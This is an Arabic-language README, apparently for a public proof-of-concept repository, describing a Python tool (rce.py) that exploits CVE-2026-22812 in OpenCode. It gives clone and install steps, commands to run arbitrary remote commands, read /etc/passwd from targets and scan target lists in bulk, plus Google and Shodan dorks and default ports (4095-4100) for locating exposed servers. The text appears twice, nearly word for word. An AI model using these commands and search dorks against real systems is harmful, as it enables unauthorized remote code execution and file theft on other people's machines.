
أداة بايثون للتحقق من واستغلال CVE-2026-22812 في OpenCode، تدعم تنفيذ الأوامر، قراءة الملفات، وفحص أهداف متعددة على المنافذ 4095-4100.
أداة استغلال OpenCode CVE-2026-22812 أدوات Python بسيطة للتحقق من ثغرة OpenCode واستغلالها (CVE-2026-22812).
التثبيت
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
الاستخدام الأساسي
# فحص هدف واحد
python rce.py -u http://target:4096 --check
# تنفيذ أمر
python rce.py -u http://target:4096 -c "whoami"
# قراءة ملف
python rce.py -u http://target:4096 --read-file /etc/passwd
# فحص أهداف متعددة
python rce.py -l targets.txt --check
# أخرى
python rce.py --help
دلائل البحث
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
المنافذ الافتراضية: 4095-4100
أدوات Python بسيطة للتحقق من ثغرة OpenCode واستغلالها (CVE-2026-22812).
التثبيت:
git clone https://github.com/CayberMods/CVE-2026-22812-POC.git
cd CVE-2026-22812-POC
pip install requests urllib3 argparse concurrent-log-handler colorama
الاستخدام الأساسي
# فحص هدف واحد
python rce.py -u http://target:4096 --check
# تنفيذ أمر
python rce.py -u http://target:4096 -c "whoami"
# قراءة ملف
python rce.py -u http://target:4096 --read-file /etc/passwd
# فحص أهداف متعددة
python rce.py -l targets.txt --check
# أخرى
دلائل البحث:
Google: intitle:"OpenCode" "Login"
Shodan: port:"4095-4100" http.component:"OpenCode"
المنافذ الافتراضية: 4095-4100